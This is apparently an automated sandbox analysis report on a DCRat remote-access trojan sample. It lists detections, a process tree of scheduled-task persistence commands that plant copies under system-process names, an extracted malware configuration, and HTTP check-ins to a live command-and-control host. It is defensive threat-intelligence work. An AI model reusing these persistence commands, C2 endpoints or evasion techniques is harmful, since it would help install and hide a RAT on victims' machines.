Edit tour

Windows Analysis Report
jmBb9uY1B8.exe

Overview

General Information

Sample name:	jmBb9uY1B8.exe renamed because original name is a hash value
Original sample name:	5d232371c6b04bf6e609ee14fc06f3f6.exe
Analysis ID:	1584524
MD5:	5d232371c6b04bf6e609ee14fc06f3f6
SHA1:	d6b7e0e98b0bd964ce6b2256f7c3f52ea2ec39ba
SHA256:	05c4814add59df3a27d840a1494002ac0b0e49aa9348229bd9f438d87e3e56c1
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Suricata IDS alerts for network traffic

Yara detected DCRat

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Creates processes via WMI

Disable UAC(promptonsecuredesktop)

Disables UAC (registry)

Drops executable to a common third party application directory

Drops executables to the windows directory (C:\Windows) and starts them

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: System File Execution Location Anomaly

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Creates or modifies windows services

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

PE file contains executable resources (Code or Archives)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

jmBb9uY1B8.exe (PID: 6784 cmdline: "C:\Users\user\Desktop\jmBb9uY1B8.exe" MD5: 5D232371C6B04BF6E609EE14FC06F3F6)

schtasks.exe (PID: 7232 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Recovery\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7280 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7300 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7320 cmdline: schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 7 /tr "'C:\Windows\twain_32\SgrmBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7340 cmdline: schtasks.exe /create /tn "SgrmBroker" /sc ONLOGON /tr "'C:\Windows\twain_32\SgrmBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7356 cmdline: schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 6 /tr "'C:\Windows\twain_32\SgrmBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7384 cmdline: schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\sihost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7400 cmdline: schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\All Users\sihost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7416 cmdline: schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\sihost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7432 cmdline: schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 12 /tr "'C:\Windows\PLA\Templates\MwDxnowBVCiAiIllnkPs.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7448 cmdline: schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPs" /sc ONLOGON /tr "'C:\Windows\PLA\Templates\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7464 cmdline: schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 10 /tr "'C:\Windows\PLA\Templates\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7480 cmdline: schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\internet explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7496 cmdline: schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPs" /sc ONLOGON /tr "'C:\Program Files (x86)\internet explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7512 cmdline: schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\internet explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7528 cmdline: schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 6 /tr "'C:\Windows\IME\IMETC\HELP\MwDxnowBVCiAiIllnkPs.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7544 cmdline: schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPs" /sc ONLOGON /tr "'C:\Windows\IME\IMETC\HELP\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7560 cmdline: schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 12 /tr "'C:\Windows\IME\IMETC\HELP\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7576 cmdline: schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 10 /tr "'C:\Recovery\MwDxnowBVCiAiIllnkPs.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7592 cmdline: schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPs" /sc ONLOGON /tr "'C:\Recovery\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7608 cmdline: schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 14 /tr "'C:\Recovery\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7624 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\jdownloader\StartMenuExperienceHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7640 cmdline: schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7656 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\jdownloader\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7672 cmdline: schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 12 /tr "'C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7688 cmdline: schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPs" /sc ONLOGON /tr "'C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7704 cmdline: schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 13 /tr "'C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

MwDxnowBVCiAiIllnkPs.exe (PID: 7744 cmdline: "C:\Program Files (x86)\internet explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe" MD5: 5D232371C6B04BF6E609EE14FC06F3F6)

MwDxnowBVCiAiIllnkPs.exe (PID: 7804 cmdline: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe MD5: 5D232371C6B04BF6E609EE14FC06F3F6)

MwDxnowBVCiAiIllnkPs.exe (PID: 7820 cmdline: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe MD5: 5D232371C6B04BF6E609EE14FC06F3F6)

RuntimeBroker.exe (PID: 7856 cmdline: C:\Recovery\RuntimeBroker.exe MD5: 5D232371C6B04BF6E609EE14FC06F3F6)

RuntimeBroker.exe (PID: 7872 cmdline: C:\Recovery\RuntimeBroker.exe MD5: 5D232371C6B04BF6E609EE14FC06F3F6)

SgrmBroker.exe (PID: 7928 cmdline: C:\Windows\twain_32\SgrmBroker.exe MD5: 5D232371C6B04BF6E609EE14FC06F3F6)

SgrmBroker.exe (PID: 7964 cmdline: C:\Windows\twain_32\SgrmBroker.exe MD5: 5D232371C6B04BF6E609EE14FC06F3F6)

sihost.exe (PID: 7980 cmdline: "C:\Users\All Users\sihost.exe" MD5: 5D232371C6B04BF6E609EE14FC06F3F6)

sihost.exe (PID: 7992 cmdline: "C:\Users\All Users\sihost.exe" MD5: 5D232371C6B04BF6E609EE14FC06F3F6)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"2\":\",\",\"m\":\"#\",\"M\":\"!\",\"N\":\"&\",\"0\":\"*\",\"6\":\")\",\"o\":\"`\",\"y\":\"@\",\"9\":\"(\",\"W\":\"$\",\"d\":\"|\",\"I\":\"-\",\"l\":\".\",\"C\":\">\",\"k\":\"<\",\"J\":\"^\",\"x\":\"~\",\"5\":\"%\",\"i\":\";\",\"a\":\"_\",\"w\":\" \"}", "PCRT": "{\"B\":\"&\",\"F\":\"!\",\"D\":\"_\",\"R\":\"%\",\"h\":\"|\",\"l\":\"`\",\"Q\":\";\",\"E\":\"~\",\"n\":\"@\",\"U\":\" \",\"s\":\"-\",\"C\":\")\",\"Z\":\"<\",\"a\":\"$\",\"S\":\">\",\"z\":\"(\",\"p\":\"*\",\"0\":\".\",\"V\":\",\",\"d\":\"#\",\"g\":\"^\"}", "TAG": "", "MUTEX": "DCR_MUTEX-aQsTso1bC14ju6vHfjNs", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000027.00000002.1846749984.00000000029BD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001F.00000002.4145128324.0000000002E07000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000021.00000002.1834388841.0000000003041000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000023.00000002.1847341933.00000000034B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000024.00000002.1848071162.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000020.00000002.1830308361.0000000002711000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000002.1730523212.0000000003043000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000002.1730523212.000000000302A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000022.00000002.1847247519.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000002.1730523212.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000021.00000002.1834388841.000000000307D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000025.00000002.1835126643.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000027.00000002.1846749984.0000000002981000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000026.00000002.1846857363.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000022.00000002.1847247519.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001F.00000002.4145128324.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000002.1735799473.0000000012EED000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: jmBb9uY1B8.exe PID: 6784	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: MwDxnowBVCiAiIllnkPs.exe PID: 7744	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
Process Memory Space: MwDxnowBVCiAiIllnkPs.exe PID: 7744	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: MwDxnowBVCiAiIllnkPs.exe PID: 7804	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: MwDxnowBVCiAiIllnkPs.exe PID: 7820	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 7856	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 7872	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: SgrmBroker.exe PID: 7928	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: SgrmBroker.exe PID: 7964	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: sihost.exe PID: 7980	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: sihost.exe PID: 7992	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 23 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.jmBb9uY1B8.exe.3184138.8.raw.unpack	INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded	Detects executables referencing many base64-encoded IR and analysis tools names	ditekSHen	0x164ec:$s4: cHJvY2V4cA 0x16e34:$s4: cHJvY2V4cA 0x1652d:$s5: cHJvY2V4cDY0 0x16e75:$s5: cHJvY2V4cDY0 0x16429:$s12: d2lyZXNoYXJr 0x16d71:$s12: d2lyZXNoYXJr 0x162d2:$s23: ZG5zcHk 0x16c1a:$s23: ZG5zcHk 0x162db:$s25: aWxzcHk 0x16c23:$s25: aWxzcHk 0x162e4:$s26: ZG90cGVla 0x16c2c:$s26: ZG90cGVla

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\jmBb9uY1B8.exe, ProcessId: 6784, TargetFilename: C:\Recovery\RuntimeBroker.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Recovery\RuntimeBroker.exe, CommandLine: C:\Recovery\RuntimeBroker.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\RuntimeBroker.exe, NewProcessName: C:\Recovery\RuntimeBroker.exe, OriginalFileName: C:\Recovery\RuntimeBroker.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Recovery\RuntimeBroker.exe, ProcessId: 7856, ProcessName: RuntimeBroker.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Recovery\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Recovery\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\jmBb9uY1B8.exe", ParentImage: C:\Users\user\Desktop\jmBb9uY1B8.exe, ParentProcessId: 6784, ParentProcessName: jmBb9uY1B8.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Recovery\RuntimeBroker.exe'" /f, ProcessId: 7232, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE DCRAT Activity (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T18:57:05.858307+0100	2034194	1	A Network Trojan was detected	192.168.2.4	49739	5.101.152.15	80	TCP

ETPRO MALWARE DCRat Initial Checkin Server Response M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T18:57:52.937988+0100	2850862	1	Malware Command and Control Activity Detected	5.101.152.15	80	192.168.2.4	49750	TCP
2025-01-05T18:59:20.434384+0100	2850862	1	Malware Command and Control Activity Detected	5.101.152.15	80	192.168.2.4	50031	TCP
2025-01-05T19:00:36.572534+0100	2850862	1	Malware Command and Control Activity Detected	5.101.152.15	80	192.168.2.4	50044	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: jmBb9uY1B8.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Windows\twain_32\SgrmBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Recovery\RuntimeBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\jDownloader\StartMenuExperienceHost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\ProgramData\sihost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984

Found malware configuration

Source: 00000000.00000002.1735799473.0000000012EED000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"SCRT": "{\"2\":\",\",\"m\":\"#\",\"M\":\"!\",\"N\":\"&\",\"0\":\"*\",\"6\":\")\",\"o\":\"`\",\"y\":\"@\",\"9\":\"(\",\"W\":\"$\",\"d\":\"|\",\"I\":\"-\",\"l\":\".\",\"C\":\">\",\"k\":\"<\",\"J\":\"^\",\"x\":\"~\",\"5\":\"%\",\"i\":\";\",\"a\":\"_\",\"w\":\" \"}", "PCRT": "{\"B\":\"&\",\"F\":\"!\",\"D\":\"_\",\"R\":\"%\",\"h\":\"|\",\"l\":\"`\",\"Q\":\";\",\"E\":\"~\",\"n\":\"@\",\"U\":\" \",\"s\":\"-\",\"C\":\")\",\"Z\":\"<\",\"a\":\"$\",\"S\":\">\",\"z\":\"(\",\"p\":\"*\",\"0\":\".\",\"V\":\",\",\"d\":\"#\",\"g\":\"^\"}", "TAG": "", "MUTEX": "DCR_MUTEX-aQsTso1bC14ju6vHfjNs", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	ReversingLabs: Detection: 76%
Source: C:\Program Files (x86)\jDownloader\StartMenuExperienceHost.exe	ReversingLabs: Detection: 76%
Source: C:\ProgramData\sihost.exe	ReversingLabs: Detection: 76%
Source: C:\Recovery\MwDxnowBVCiAiIllnkPs.exe	ReversingLabs: Detection: 76%
Source: C:\Recovery\RuntimeBroker.exe	ReversingLabs: Detection: 76%
Source: C:\Windows\IME\IMETC\HELP\MwDxnowBVCiAiIllnkPs.exe	ReversingLabs: Detection: 76%
Source: C:\Windows\PLA\Templates\MwDxnowBVCiAiIllnkPs.exe	ReversingLabs: Detection: 76%
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	ReversingLabs: Detection: 76%
Source: C:\Windows\twain_32\SgrmBroker.exe	ReversingLabs: Detection: 76%

Multi AV Scanner detection for submitted file

Source: jmBb9uY1B8.exe	Virustotal: Detection: 76%			Perma Link
Source: jmBb9uY1B8.exe	ReversingLabs: Detection: 76%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Windows\twain_32\SgrmBroker.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Joe Sandbox ML: detected
Source: C:\Recovery\RuntimeBroker.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\jDownloader\StartMenuExperienceHost.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\sihost.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: jmBb9uY1B8.exe

Joe Sandbox ML: detected

Source: jmBb9uY1B8.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: jmBb9uY1B8.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Code function: 4x nop then dec eax

31_2_00007FFD9BA97DB1

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49739 -> 5.101.152.15:80
Source: Network traffic	Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 5.101.152.15:80 -> 192.168.2.4:49750
Source: Network traffic	Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 5.101.152.15:80 -> 192.168.2.4:50031
Source: Network traffic	Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 5.101.152.15:80 -> 192.168.2.4:50044

Source: Joe Sandbox View

ASN Name: BEGET-ASRU BEGET-ASRU

Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?b6HJXtf=X3QUfa7Lxah4DWkcnRkhelidjFg&nO2C=tNXjw4Eymxo9xHEWogFJ&XwVwva42ijhfRTJM20Xfs1x4ev7bs9r=2oWbCxBeJ6ENGdfy5KvqsnPf8&152f328392d8768f56766d0288112f44=f6a1095ee603dfb2a6045076d6e72102&365174fb29f58fe307a28d17c1f20f9c=QYkJ2NxQjZjdjM3EzM2gzNiNDOxQzYlFTNzkDOmF2MhlTZ3ETMmZjY&b6HJXtf=X3QUfa7Lxah4DWkcnRkhelidjFg&nO2C=tNXjw4Eymxo9xHEWogFJ&XwVwva42ijhfRTJM20Xfs1x4ev7bs9r=2oWbCxBeJ6ENGdfy5KvqsnPf8 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZTZ0czY0EWYyUDNxM2YiVGZwIWMxkDN0QGO5IGOkdjYjBjNmFGZmJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
